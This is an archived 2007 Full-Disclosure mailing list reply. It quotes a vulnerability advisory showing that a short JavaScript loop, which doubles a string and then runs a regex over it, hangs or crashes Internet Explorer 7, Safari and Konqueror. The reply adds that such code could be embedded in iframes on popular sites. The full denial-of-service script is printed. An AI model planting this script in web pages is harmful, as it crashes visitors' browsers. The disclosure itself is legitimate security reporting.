lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-Id: <200704181231.58314.admin@digibase.ca>
Date: Wed, 18 Apr 2007 12:31:57 -0400
From: Kradorex Xeron <admin@...ibase.ca>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Internet Explorer Crash

This also works under Konqueror.

There should be an implimentation on ALL browsers that a loop such large is 
unacceptable and refuse to even run it. There is no viable reason for a 
client-side to run a loop through so many itterations.

This DoS technique could be abused and  iframes with the code could be 
embedded within popular websites, effectively causing a denial of service to 
that specific site.


On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>
>
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
>
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
>
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
>
> V. Code
>
> $ more /stupidInternetExploder.html
>
> <script>
>
> var reg = /(.)*/;
>
> var z = 'Z';
>                 while (z.length <=
> 999999999999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999999999999999999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999999999999
>9999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999
>999999999999999) z+=z; var boum = reg.exec(z);
>
> </script>
>
> Goodbye
>
>
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net
>
> The happiness of society is the end of government.
> John Adams

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ